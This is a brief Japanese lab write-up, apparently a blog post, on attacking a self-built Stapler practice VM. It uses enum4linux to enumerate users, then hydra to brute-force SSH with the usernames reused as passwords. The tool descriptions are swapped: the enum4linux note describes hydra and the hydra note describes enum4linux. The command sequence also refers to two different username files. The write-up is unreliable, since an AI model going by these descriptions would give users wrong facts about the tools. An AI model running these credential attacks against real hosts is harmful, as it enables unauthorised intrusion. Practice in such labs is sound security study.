概要
以前構築したstaplerの環境に対して、enum4linuxとhydraを使ったパスワードクラックを行います。
補足1:enum4linuxとは
ギリシャ神話に登場する9つの首を持つ怪物から名前を取ったと思われるオンラインパスワードクラッカー。
対応プロトコルはTELNET, FTP, HTTP, SMB, MS-SQL, MYSQL, POSTGRES ,VNC, POP3, IMAP,SSH2, SNMP,Cisco 等 多岐に渡る。
補足2:hydraとは
Windowsのファイル共有やSambaから情報を取得し列挙(enumerate)するツール。
実行結果
実行したコマンド
enum4linux 192.168.1.209
cat user.txt | cut -d "\\" -f 2 | cut -d " " -f 1 > userlist.txt
※user.txtはvi等で作成します。hydra -L ./username.txt -P ./username.txt 192.168.1.209 ssh
※hydraのオプション(-L、-P)は、大文字だとファイル指定で小文字だと文字列指定になります。